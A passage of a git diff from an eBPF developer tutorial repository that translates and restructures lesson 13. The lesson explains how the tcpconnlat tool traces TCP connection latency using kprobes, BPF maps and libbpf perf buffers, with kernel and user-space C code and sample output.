fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err)); - goto cleanup; - } - /* reset err to return 0 if exiting */ - err = 0; - } -``` - -这段代码使用一个while循环来反复轮询perf event buffer。如果轮询出错(例如由于信号中断),会打印出错误消息。这个轮询过程会一直持续,直到收到一个退出标志`exiting`。 - -接下来,让我们来看看`handle_event`函数,这个函数将处理从内核发送到用户态的每一个eBPF事件: +Next, let's take a look at the `handle_event` function, which handles every eBPF event sent from the kernel to user space: ```c void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { @@ -559,19 +528,18 @@ void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { } ``` -`handle_event`函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个`event`结构体,包含了之前在内核态计算得到的TCP连接的信息。 +The `handle_event` function takes arguments including the CPU number, a pointer to the data, and the size of the data. The data is a `event` structure that contains information about TCP connections computed in the kernel space. 
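For reference, a simplified sketch of what such an `event` layout looks like; the field names below follow the `tcpconnlat.h` of bcc's libbpf-tools (the reference implementation cited in this tutorial's references) and are abridged here:

```c
/* Sketch of the layout shared between the eBPF program and user space,
 * modeled on bcc libbpf-tools' tcpconnlat.h (types from <linux/types.h>). */
struct event {
    union {
        __u32 saddr_v4;
        __u8  saddr_v6[16];
    };
    union {
        __u32 daddr_v4;
        __u8  daddr_v6[16];
    };
    char  comm[16];   /* process name (TASK_COMM_LEN) */
    __u64 delta_us;   /* SYN -> reply latency in microseconds */
    __u64 ts_us;      /* timestamp when the event was emitted */
    __u32 tgid;       /* process ID */
    int   af;         /* address family: AF_INET or AF_INET6 */
    __u16 lport;      /* local (source) port */
    __u16 dport;      /* destination port */
};
```

Because `handle_event` receives only a `void *data`, agreement on this layout between the kernel-side program and the user-space reader is what makes the cast at the top of the function safe.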
-首先,它将接收到的事件的时间戳和起始时间戳(如果存在)进行对比,计算出事件的相对时间,并打印出来。接着,根据IP地址的类型(IPv4或IPv6),将源地址和目标地址从网络字节序转换为主机字节序。 +First, it compares the timestamp of the received event with the start timestamp (if available) to calculate the relative time of the event, and then prints it. Next, it converts the source address and destination address from network byte order to host byte order based on the IP address type (IPv4 or IPv6). -最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。 +Finally, depending on whether the user chooses to display the local port, it prints the process ID, process name, IP version, source IP address, local port (if available), destination IP address, destination port, and connection establishment time. This connection establishment time is calculated in the eBPF program running in the kernel space and sent to the user space. -## 编译运行 +## Compilation and Execution ```console $ make ... - BPF .output/tcpconnlat.bpf.o - GEN-SKEL .output/tcpconnlat.skel.h + BPF .output/tcpconnlat.bpf.o + GEN-SKEL .output/tcpconnlat.skel.h CC .output/tcpconnlat.o BINARY tcpconnlat $ sudo ./tcpconnlat @@ -582,18 +550,22 @@ PID COMM IP SADDR DADDR DPORT LAT(ms) 222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31 ``` -源代码: 关于如何安装依赖,请参考: +Source code: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat) -参考资料: +References: -- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) +- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) in bcc -## 总结 +## Summary -通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。 +In this eBPF introductory tutorial, we learned how to use eBPF to track and measure the latency of TCP connections. We first explored how eBPF programs can attach to specific kernel functions in kernel-space and capture the start and end times of connection establishment to calculate latency. -我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。 +We also learned how to use BPF maps to store and retrieve data in kernel-space, enabling data sharing among different parts of the eBPF program. Additionally, we discussed how to use perf events to send data from kernel-space to user-space for further processing and display. -在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。 +In user-space, we introduced the usage of libbpf library APIs, such as perf_buffer__poll, to receive and process data sent from the kernel-space. We also demonstrated how to parse and print this data in a human-readable format. -如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you are interested in learning more about eBPF and its practical applications, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). You can also visit our tutorial code repository at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) for more examples and complete tutorials. + +In the upcoming tutorials, we will dive deeper into advanced features of eBPF, such as tracing the path of network packets and fine-grained system performance monitoring. 
We will continue to share more content on eBPF development practices to help you better understand and master eBPF technology. We hope these resources will be valuable in your learning and practical journey with eBPF. + +> The original link of this article: diff --git a/src/13-tcpconnlat/README.zh.md b/src/13-tcpconnlat/README.zh.md new file mode 100644 index 0000000..e069414 --- /dev/null +++ b/src/13-tcpconnlat/README.zh.md @@ -0,0 +1,599 @@ +# eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据 + +eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 + +本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。 + +## 背景 + +在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。 + +分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。 + +## tcpconnlat 工具概述 + +`tcpconnlat` 这个工具能够跟踪内核中执行活动 TCP 连接的函数(如通过 `connect()` 系统调用),并测量并显示连接延时,即从发送 SYN 到收到响应包的时间。 + +### TCP 连接原理 + +TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤: + +1. 客户端向服务器发送 SYN 包:客户端通过 `connect()` 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。 +2. SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。 +3. 服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。 +4. SYN/ACK 包传送到客户端:这是另一次网络传输。 +5. 客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。 +6. ACK 包传送到服务器:这是第三次网络传输。 +7. 服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。 +8. 唤醒服务器端用户进程:被 `accept()` 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。 + +完整的流程图如下所示: + +![tcpconnlat1](tcpconnlat1.png) + +在客户端视角,在正常情况下一次TCP连接总的耗时也就大约是一次网络RTT的耗时。但在某些情况下,可能会导致连接时的网络传输耗时上涨、CPU处理开销增加、甚至是连接失败。这种时候在发现延时过长之后,就可以结合其他信息进行分析。 + +## tcpconnlat 的 eBPF 实现 + +为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列: + +- 半连接队列(SYN 队列):存储那些正在进行三次握手操作的 TCP 连接,服务器收到 SYN 包后,会将该连接信息存储在此队列中。 +- 全连接队列(Accept 队列):存储已经完成三次握手,等待应用程序调用 `accept()` 函数的 TCP 连接。服务器在收到 ACK 包后,会创建一个新的连接并将其添加到此队列。 + +理解了这两个队列的用途,我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分,其中包括了几个主要的跟踪点:`tcp_v4_connect`, `tcp_v6_connect` 和 `tcp_rcv_state_process`。 + +这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。 + +让我们先来看一下这些挂载点的源代码: + +```c +SEC("kprobe/tcp_v4_connect") +int BPF_KPROBE(tcp_v4_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_v6_connect") +int BPF_KPROBE(tcp_v6_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_rcv_state_process") +int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) +{ + return handle_tcp_rcv_state_process(ctx, sk); +} +``` + +这段代码展示了三个内核探针(kprobe)的定义。`tcp_v4_connect` 和 `tcp_v6_connect` 在对应的 IPv4 和 IPv6 连接被初始化时被触发,调用 `trace_connect()` 函数,而 `tcp_rcv_state_process` 在内核处理 TCP 连接状态变化时被触发,调用 `handle_tcp_rcv_state_process()` 函数。 + +接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。 + +### tcp_v4_connect 函数解析 + +`tcp_v4_connect`函数是Linux内核处理TCP的IPv4连接请求的主要方式。当用户态程序通过`socket`系统调用创建了一个套接字后,接着通过`connect`系统调用尝试连接到远程服务器,此时就会触发`tcp_v4_connect`函数。 + +```c +/* This will initiate an outgoing connection.
*/ +int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) +{ + struct sockaddr_in *usin = (struct sockaddr_in *)uaddr; + struct inet_timewait_death_row *tcp_death_row; + struct inet_sock *inet = inet_sk(sk); + struct tcp_sock *tp = tcp_sk(sk); + struct ip_options_rcu *inet_opt; + struct net *net = sock_net(sk); + __be16 orig_sport, orig_dport; + __be32 daddr, nexthop; + struct flowi4 *fl4; + struct rtable *rt; + int err; + + if (addr_len < sizeof(struct sockaddr_in)) + return -EINVAL; + + if (usin->sin_family != AF_INET) + return -EAFNOSUPPORT; + + nexthop = daddr = usin->sin_addr.s_addr; + inet_opt = rcu_dereference_protected(inet->inet_opt, + lockdep_sock_is_held(sk)); + if (inet_opt && inet_opt->opt.srr) { + if (!daddr) + return -EINVAL; + nexthop = inet_opt->opt.faddr; + } + + orig_sport = inet->inet_sport; + orig_dport = usin->sin_port; + fl4 = &inet->cork.fl.u.ip4; + rt = ip_route_connect(fl4, nexthop, inet->inet_saddr, + sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport, + orig_dport, sk); + if (IS_ERR(rt)) { + err = PTR_ERR(rt); + if (err == -ENETUNREACH) + IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES); + return err; + } + + if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) { + ip_rt_put(rt); + return -ENETUNREACH; + } + + if (!inet_opt || !inet_opt->opt.srr) + daddr = fl4->daddr; + + tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row; + + if (!inet->inet_saddr) { + err = inet_bhash2_update_saddr(sk, &fl4->saddr, AF_INET); + if (err) { + ip_rt_put(rt); + return err; + } + } else { + sk_rcv_saddr_set(sk, inet->inet_saddr); + } + + if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) { + /* Reset inherited state */ + tp->rx_opt.ts_recent = 0; + tp->rx_opt.ts_recent_stamp = 0; + if (likely(!tp->repair)) + WRITE_ONCE(tp->write_seq, 0); + } + + inet->inet_dport = usin->sin_port; + sk_daddr_set(sk, daddr); + + inet_csk(sk)->icsk_ext_hdr_len = 0; + if (inet_opt) + inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen; + + tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT; + + /* Socket identity is still unknown (sport may be zero). + * However we set state to SYN-SENT and not releasing socket + * lock select source port, enter ourselves into the hash tables and + * complete initialization after this. + */ + tcp_set_state(sk, TCP_SYN_SENT); + err = inet_hash_connect(tcp_death_row, sk); + if (err) + goto failure; + + sk_set_txhash(sk); + + rt = ip_route_newports(fl4, rt, orig_sport, orig_dport, + inet->inet_sport, inet->inet_dport, sk); + if (IS_ERR(rt)) { + err = PTR_ERR(rt); + rt = NULL; + goto failure; + } + /* OK, now commit destination to socket. */ + sk->sk_gso_type = SKB_GSO_TCPV4; + sk_setup_caps(sk, &rt->dst); + rt = NULL; + + if (likely(!tp->repair)) { + if (!tp->write_seq) + WRITE_ONCE(tp->write_seq, + secure_tcp_seq(inet->inet_saddr, + inet->inet_daddr, + inet->inet_sport, + usin->sin_port)); + tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr, + inet->inet_daddr); + } + + inet->inet_id = get_random_u16(); + + if (tcp_fastopen_defer_connect(sk, &err)) + return err; + if (err) + goto failure; + + err = tcp_connect(sk); + + if (err) + goto failure; + + return 0; + +failure: + /* + * This unhashes the socket and releases the local port, + * if necessary. 
+ */ + tcp_set_state(sk, TCP_CLOSE); + inet_bhash2_reset_saddr(sk); + ip_rt_put(rt); + sk->sk_route_caps = 0; + inet->inet_dport = 0; + return err; +} +EXPORT_SYMBOL(tcp_v4_connect); +``` + +参考链接: + +接下来,我们一步步分析这个函数: + +首先,这个函数接收三个参数:一个套接字指针`sk`,一个指向套接字地址结构的指针`uaddr`和地址的长度`addr_len`。 + +```c +int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) +``` + +函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。 + +接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。 + +```c +nexthop = daddr = usin->sin_addr.s_addr; +inet_opt = rcu_dereference_protected(inet->inet_opt, + lockdep_sock_is_held(sk)); +if (inet_opt && inet_opt->opt.srr) { + if (!daddr) + return -EINVAL; + nexthop = inet_opt->opt.faddr; +} +``` + +然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。 + +接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为`SYN-SENT`。 + +然后,这个函数使用`inet_hash_connect`函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。 + +如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。 + +接下来,它提交目标信息到套接字,并为之后的分段偏移选择一个安全的随机值。 + +然后,函数尝试使用TCP Fast Open(TFO)进行连接,如果不能使用TFO或者TFO尝试失败,它会使用普通的TCP三次握手进行连接。 + +最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。 + +总的来说,`tcp_v4_connect`函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。 + +### 内核态代码 + +```c +// SPDX-License-Identifier: GPL-2.0 +// Copyright (c) 2020 Wenbo Zhang +#include <vmlinux.h> +#include <bpf/bpf_helpers.h> +#include <bpf/bpf_core_read.h> +#include <bpf/bpf_tracing.h> +#include "tcpconnlat.h" + +#define AF_INET 2 +#define AF_INET6 10 + +const volatile __u64 targ_min_us = 0; +const volatile pid_t targ_tgid = 0; + +struct piddata { + char comm[TASK_COMM_LEN]; + u64 ts; + u32 tgid; +}; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, struct sock *); + __type(value, struct piddata); +} start SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); + +static int trace_connect(struct sock *sk) +{ + u32 tgid = bpf_get_current_pid_tgid() >> 32; + struct piddata piddata = {}; + + if (targ_tgid && targ_tgid != tgid) + return 0; + + bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); + piddata.ts = bpf_ktime_get_ns(); + piddata.tgid = tgid; + bpf_map_update_elem(&start, &sk, &piddata, 0); + return 0; +} + +static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) +{ + struct piddata *piddatap; + struct event event = {}; + s64 delta; + u64 ts; + + if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) + return 0; + + piddatap = bpf_map_lookup_elem(&start, &sk); + if (!piddatap) + return 0; + + ts = bpf_ktime_get_ns(); + delta = (s64)(ts - piddatap->ts); + if (delta < 0) + goto cleanup; + + event.delta_us = delta / 1000U; + if (targ_min_us && event.delta_us < targ_min_us) + goto cleanup; + __builtin_memcpy(&event.comm, piddatap->comm, + sizeof(event.comm)); + event.ts_us = ts / 1000; + event.tgid = piddatap->tgid; + event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); + event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); + event.af = BPF_CORE_READ(sk, __sk_common.skc_family); + if (event.af == AF_INET) { + event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); + event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); + } else { + BPF_CORE_READ_INTO(&event.saddr_v6, sk, + __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); + BPF_CORE_READ_INTO(&event.daddr_v6, sk, + __sk_common.skc_v6_daddr.in6_u.u6_addr32); + } + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, + 
&event, sizeof(event)); + +cleanup: + bpf_map_delete_elem(&start, &sk); + return 0; +} + +SEC("kprobe/tcp_v4_connect") +int BPF_KPROBE(tcp_v4_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_v6_connect") +int BPF_KPROBE(tcp_v6_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_rcv_state_process") +int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) +{ + return handle_tcp_rcv_state_process(ctx, sk); +} + +SEC("fentry/tcp_v4_connect") +int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("fentry/tcp_v6_connect") +int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("fentry/tcp_rcv_state_process") +int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk) +{ + return handle_tcp_rcv_state_process(ctx, sk); +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(`connect`系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。 + +首先,定义了两个eBPF maps:`start`和`events`。`start`是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而`events`是一个`PERF_EVENT_ARRAY`类型的map,用于将事件数据传输到用户态。 + +```c +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, struct sock *); + __type(value, struct piddata); +} start SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); +``` + +在`tcp_v4_connect`和`tcp_v6_connect`的kprobe处理函数`trace_connect`中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到`start`这个map中。 + +```c +static int trace_connect(struct sock *sk) +{ + u32 tgid = bpf_get_current_pid_tgid() >> 32; + struct piddata piddata = {}; + + if (targ_tgid && targ_tgid != tgid) + return 0; + + bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); + piddata.ts = bpf_ktime_get_ns(); + piddata.tgid = tgid; + bpf_map_update_elem(&start, &sk, &piddata, 0); + return 0; +} +``` + +当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发`tcp_rcv_state_process`的kprobe处理函数`handle_tcp_rcv_state_process`。在这个函数中,首先检查socket的状态是否为`SYN-SENT`,如果是,会从`start`这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过`bpf_perf_event_output`函数发送到用户态。 + +```c +static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) +{ + struct piddata *piddatap; + struct event event = {}; + s64 delta; + u64 ts; + + if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) + return 0; + + piddatap = bpf_map_lookup_elem(&start, &sk); + if (!piddatap) + return 0; + + ts = bpf_ktime_get_ns(); + delta = (s64)(ts - piddatap->ts); + if (delta < 0) + goto cleanup; + + event.delta_us = delta / 1000U; + if (targ_min_us && event.delta_us < targ_min_us) + goto cleanup; + __builtin_memcpy(&event.comm, piddatap->comm, + sizeof(event.comm)); + event.ts_us = ts / 1000; + event.tgid = piddatap->tgid; + event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); + event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); + event.af = BPF_CORE_READ(sk, __sk_common.skc_family); + if (event.af == AF_INET) { + event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); + event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); + } else { + BPF_CORE_READ_INTO(&event.saddr_v6, sk, + __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); + BPF_CORE_READ_INTO(&event.daddr_v6, sk, + __sk_common.skc_v6_daddr.in6_u.u6_addr32); + } + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, + 
bpf_map_delete_elem(&start, &sk); + return 0; +} +``` + +理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用`tcp_v4_connect`或`tcp_v6_connect`函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过`tcp_rcv_state_process`函数来处理。eBPF程序通过在这两个关键函数上设置kprobe,可以在关键时刻得到通知并执行相应的处理代码。 + +一些关键概念说明: + +- kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。 +- map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。 +- socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的`struct sock`结构就是对socket的实现。 + +### 用户态数据处理 + +用户态数据处理是使用`perf_buffer__poll`来接收并处理从内核发送到用户态的eBPF事件。`perf_buffer__poll`是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。 + +首先,让我们详细看一下主轮询循环: + +```c + /* main: poll */ + while (!exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err)); + goto cleanup; + } + /* reset err to return 0 if exiting */ + err = 0; + } +``` + +这段代码使用一个while循环来反复轮询perf event buffer。如果轮询出错(例如由于信号中断),会打印出错误消息。这个轮询过程会一直持续,直到收到一个退出标志`exiting`。 + +接下来,让我们来看看`handle_event`函数,这个函数将处理从内核发送到用户态的每一个eBPF事件: + +```c +void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { + const struct event* e = data; + char src[INET6_ADDRSTRLEN]; + char dst[INET6_ADDRSTRLEN]; + union { + struct in_addr x4; + struct in6_addr x6; + } s, d; + static __u64 start_ts; + + if (env.timestamp) { + if (start_ts == 0) + start_ts = e->ts_us; + printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0); + } + if (e->af == AF_INET) { + s.x4.s_addr = e->saddr_v4; + d.x4.s_addr = e->daddr_v4; + } else if (e->af == AF_INET6) { + memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr)); + memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr)); + } else { + fprintf(stderr, "broken event: event->af=%d", e->af); + return; + } + + if (env.lport) { + printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid, + e->comm, e->af == AF_INET ? 4 : 6, + inet_ntop(e->af, &s, src, sizeof(src)), e->lport, + inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), + e->delta_us / 1000.0); + } else { + printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm, + e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)), + inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), + e->delta_us / 1000.0); + } +} +``` + +`handle_event`函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个`event`结构体,包含了之前在内核态计算得到的TCP连接的信息。 + +首先,它将接收到的事件的时间戳和起始时间戳(如果存在)进行对比,计算出事件的相对时间,并打印出来。接着,根据IP地址的类型(IPv4或IPv6),将源地址和目标地址从网络字节序转换为主机字节序。 + +最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。 + +## 编译运行 + +```console +$ make +... 
+ BPF .output/tcpconnlat.bpf.o + GEN-SKEL .output/tcpconnlat.skel.h + CC .output/tcpconnlat.o + BINARY tcpconnlat +$ sudo ./tcpconnlat +PID COMM IP SADDR DADDR DPORT LAT(ms) +222564 wget 4 192.168.88.15 110.242.68.3 80 25.29 +222684 wget 4 192.168.88.15 167.179.101.42 443 246.76 +222726 ssh 4 192.168.88.15 167.179.101.42 22 241.17 +222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31 +``` + +源代码: 关于如何安装依赖,请参考: + +参考资料: + +- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) + +## 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。 + +我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。 + +在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。 + +如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/13-tcpconnlat/README_en.md b/src/13-tcpconnlat/README_en.md deleted file mode 100644 index 491199b..0000000 --- a/src/13-tcpconnlat/README_en.md +++ /dev/null @@ -1,571 +0,0 @@ -# eBPF Tutorial by Example 13: Statistics of TCP Connection Delay with libbpf - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. - -This article is the thirteenth installment of the eBPF Tutorial by Example, mainly about how to use eBPF to statistics TCP connection delay and process data in user space using libbpf. - -## Background - -When developing backends, regardless of the programming language used, we often need to call databases such as MySQL and Redis, perform RPC remote calls, or call other RESTful APIs. The underlying implementation of these calls is usually based on the TCP protocol. This is because TCP protocol has advantages such as reliable connection, error retransmission, congestion control, etc., so TCP is more widely used in network transport layer protocols than UDP. However, TCP also has some drawbacks, such as longer connection establishment delay. Therefore, some alternative solutions have emerged, such as QUIC (Quick UDP Internet Connections). - -Analyzing TCP connection delay is very useful for network performance analysis, optimization, and troubleshooting. - -## Overview of tcpconnlat Tool - -The `tcpconnlat` tool can trace the functions in the kernel that perform active TCP connections (such as using the `connect()` system call), measure and display connection delay, i.e., the time from sending SYN to receiving response packets. - -### TCP Connection Principle - -The process of establishing a TCP connection is often referred to as the "three-way handshake". Here are the steps of the entire process: - -1. Client sends SYN packet to the server: The client sends SYN through the `connect()` system call. This involves local system call and CPU time cost of software interrupts. -2. SYN packet is transmitted to the server: This is a network transmission that depends on network latency. -3. Server handles the SYN packet: The server kernel receives the packet through a software interrupt, then puts it into the listen queue and sends SYN/ACK response. This mainly involves CPU time cost. -4. SYN/ACK packet is transmitted to the client: This is another network transmission. -5. 
